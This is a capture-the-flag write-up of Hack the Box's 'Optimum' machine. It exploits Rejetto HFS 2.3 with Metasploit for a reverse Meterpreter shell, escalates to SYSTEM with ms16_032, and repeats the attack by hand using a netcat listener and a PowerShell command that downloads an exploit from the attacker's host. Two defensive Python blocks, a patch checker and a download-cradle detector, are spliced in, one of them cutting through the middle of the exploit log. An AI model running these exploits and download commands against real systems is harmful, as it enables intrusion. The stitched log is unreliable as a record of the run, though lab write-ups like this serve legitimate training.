Hack the Box Optimum
My write-up on HTB’s retired machine “Optimum” that outlines Metasploit usage and manual exploitation.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
First, let’s use nmapAutomator to automate the recon/enumeration process.
Summary of our nmap scan results:
./nmapAutomator.sh 10.10.10.8 vulns
Running a vulns scan on 10.10.10.8
Host is likely running Windows
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 09:27 EDT
Nmap scan report for 10.10.10.8
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.40 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 09:27 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.8
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GENERIC]
|
| References:
| http://www.mkit.com.ar/labs/htexploit/
| http://capec.mitre.org/data/definitions/274.html
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_ https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_http-server-header: HFS 2.3
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://www.tenable.com/plugins/nessus/55976
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://seclists.org/fulldisclosure/2011/Aug/175
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.90 seconds
---------------------Finished all Nmap scans---------------------
Enumeration
Based on the nmap result, port 80/tcp is the only one to work with, so before enumerating further we can browse to the website and examine it manually.
The next steps for further enumeration would be to run Nikto, Dirbuster, or another web application assessment tool; however, since we already have the server application information (‘HttpFileServer 2.3’), we can start there.
“HttpFileServer version 2.3” is from rejetto.com, so we proceed to exploit-db.com to see if we can find any related information.
Results from exploit-db
Based on our exploit-db query, there are several exploits we can work with. Let’s start with the Metasploit module “Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)”.
Exploitation
Initial Foothold
msf > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
msf >
* Set our options for RHOST and LHOST. Everything else can be left as is.
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.10.10.8 yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
After setting the required options, the exploit can be run.
msf exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.27:4444
[*] Using URL: http://0.0.0.0:8080/O1WxakE
[*] Local IP: http://172.16.70.162:8080/O1WxakE
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /O1WxakE
[*] Sending stage (180291 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.27:4444 -> 10.10.10.8:49162) at 2020-04-25 10:27:41 -0400
[!] Tried to delete %TEMP%\SWTVkBbOKu.vbs, unknown result
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
The exploit worked; however, it only gave us an unprivileged user account and the user.txt flag.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
meterpreter > dir
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2020-05-01 19:27:54 -0400 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 07:57:16 -0400 desktop.ini
100777/rwxrwxrwx 760320 fil 2014-02-16 06:58:52 -0500 hfs.exe
100444/r--r--r-- 32 fil 2017-03-18 08:13:18 -0400 user.txt.txt
meterpreter >
Privilege Escalation
System Information
systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ▒▒
System Boot Time: 29/7/2020, 8:19:04 ▒▒
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.471 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.927 MB
Virtual Memory: In Use: 576 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Root flag obtained
After much trial and error testing the local exploits proposed by Metasploit’s exploit suggester, ms16_032 was the one that gave us administrative privileges.
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.14.6:5555
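From the defender’s side, the same systeminfo output answers the question “is this host missing the patch that exploit suggester just recommended?”. The following is an added example, not part of the write-up: it parses a constructed excerpt of the systeminfo output above and reports which bulletins have no matching KB installed. The MS16-032 to KB3139914 mapping is my own assumption (from memory of the Microsoft bulletin), not something the write-up states.

```python
import re

# Constructed excerpt of the systeminfo output shown above, trimmed to the
# fields this check needs (the real box lists 31 hotfixes).
SYSTEMINFO_SAMPLE = """Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Bulletin -> KB that closes it on Windows 8.1 / Server 2012 R2. The MS16-032
# mapping is an assumption from my own notes, not from the write-up; confirm
# it against the Microsoft bulletin before relying on it.
REQUIRED_KBS = {
    "MS16-032 (Secondary Logon handle privesc)": "KB3139914",
}


def parse_systeminfo(text):
    """Return (OS Version string, set of installed KB ids) from systeminfo output."""
    m = re.search(r"^OS Version:\s*(.+?)\s*$", text, re.MULTILINE)
    os_version = m.group(1) if m else None
    # Hotfix entries look like "[01]: KB2959936"; requiring the bracketed index
    # keeps us from picking up KB-looking tokens elsewhere in the output.
    installed = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return os_version, installed


def missing_patches(text, required=REQUIRED_KBS):
    """Return the bulletins whose KB is absent from the host's hotfix list."""
    _, installed = parse_systeminfo(text)
    return sorted(name for name, kb in required.items() if kb not in installed)


if __name__ == "__main__":
    version, installed = parse_systeminfo(SYSTEMINFO_SAMPLE)
    print(f"OS version: {version}; {len(installed)} hotfixes parsed")
    for bulletin in missing_patches(SYSTEMINFO_SAMPLE):
        print("MISSING:", bulletin)
```

Feed it the full systeminfo output from a host and extend REQUIRED_KBS with the KBs your exploit suggester flags to turn the same data into a patch-gap report.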
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\VIkcPqsW.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2144
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2124
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
cTu8VEo134AzTq3PknBtaK0T8EOyorvJ
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.6:5555 -> 10.10.10.8:49180) at 2020-07-23 08:18:08 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\VIkcPqsW.ps1
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
C:\Users\kostas\Desktop>dir ..\..\administrator\desktop\
dir ..\..\administrator\desktop\
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\administrator\desktop
18/03/2017 03:14 ▒▒ <DIR> .
18/03/2017 03:14 ▒▒ <DIR> ..
18/03/2017 03:14 ▒▒ 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.270.528 bytes free
Manual exploitation
Searched for the same vulnerability “Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution” and found an exploit on exploit-db.
---------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution | windows/remote/39161.py
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@cainta:~/Documents/htb/Optimum# searchsploit rejetto
---------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) - Remote Command Execution (Meta | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabiliti | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command | windows/webapps/34852.txt
---------------------------------------------------------------- ---------------------------------
Modified the exploit to reflect my local settings:
Set up a netcat listener on port 4444 and, in another window, hosted nc.exe.
root@cainta:~/Documents/htb/Optimum# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
User flag obtained
Privilege Escalation
Since we have already identified a local exploit that elevates our privileges (see the Metasploit section), let’s use the same local exploit.
Host an HTTP service on the attacking machine so that, from the target, we can download the compiled exploit executable.
Since neither wget nor curl is available on the target, we use PowerShell to download the exploit.
C:\Users\kostas\Downloads>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:80/41020.exe', 'c:\Users\kostas\Downloads\41020.exe')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:80/41020.exe', 'c:\Users\kostas\Downloads\41020.exe')"
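The WebClient one-liner above is exactly the kind of download cradle that PowerShell Script Block Logging (Event ID 4104) records, so it is a good place to put a detection. As an added example, not from the write-up, the following Python scans constructed 4104-style records (the first one is the cradle used above) and flags common cradle shapes with the URL they fetch; the event records and rule names are my own assumptions.

```python
import re

# Constructed Script Block Logging records (Event ID 4104 style); not real logs
# from the box. Event 1 is the exact cradle used in the write-up above.
SAMPLE_EVENTS = [
    {"id": 1, "user": "OPTIMUM\\kostas",
     "script": "(new-object System.Net.WebClient).DownloadFile("
               "'http://10.10.14.6:80/41020.exe', 'c:\\Users\\kostas\\Downloads\\41020.exe')"},
    {"id": 2, "user": "OPTIMUM\\kostas",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6/stage.ps1')"},
    {"id": 3, "user": "OPTIMUM\\admin",
     "script": "Get-ChildItem C:\\Users\\kostas\\Downloads | Sort-Object LastWriteTime"},
    {"id": 4, "user": "OPTIMUM\\kostas",
     "script": "Invoke-WebRequest -Uri http://10.10.14.6/update.exe -OutFile C:\\Temp\\u.exe"},
]

# (rule name, regex). Matched case-insensitively because PowerShell is, and
# with DOTALL so multi-line script blocks are handled.
CRADLE_RULES = [
    ("WebClient download", r"net\.webclient\b.*?\.download(file|string|data)\s*\("),
    ("Invoke-WebRequest with -OutFile", r"\b(invoke-webrequest|iwr)\b.*-outfile\b"),
    ("IEX of downloaded content", r"\b(iex|invoke-expression)\b.*\.download(string|data)\s*\("),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def detect_cradle(script):
    """Return [(rule name, first URL or None)] for every rule the block trips."""
    hits = []
    for name, pattern in CRADLE_RULES:
        if re.search(pattern, script, re.IGNORECASE | re.DOTALL):
            url = URL_RE.search(script)
            hits.append((name, url.group(0) if url else None))
    return hits


def triage(events):
    """Return alerts as (event id, user, rule, url) tuples, in event order."""
    return [(ev["id"], ev["user"], rule, url)
            for ev in events for rule, url in detect_cradle(ev["script"])]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print("ALERT event=%d user=%s rule=%r url=%s" % alert)
```

The extracted URL is what you pivot on next: an unfamiliar host on the attacker-style 10.10.14.0/24 range fetched by a low-privilege user is the signal, and the benign Get-ChildItem block shows the rules stay quiet on ordinary admin activity.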
Root flag obtained
C:\Users\kostas\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Downloads>whoami
whoami
nt authority\system
C:\Users\kostas\Downloads>dir ..\desktop
dir ..\desktop
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\kostas\desktop
30/07/2020 08:48 ▒▒ <DIR> .
30/07/2020 08:48 ▒▒ <DIR> ..
18/03/2017 03:11 ▒▒ 760.320 hfs.exe
18/03/2017 03:13 ▒▒ 32 user.txt.txt
2 File(s) 760.352 bytes
2 Dir(s) 31.886.520.320 bytes free
C:\Users\kostas\Downloads>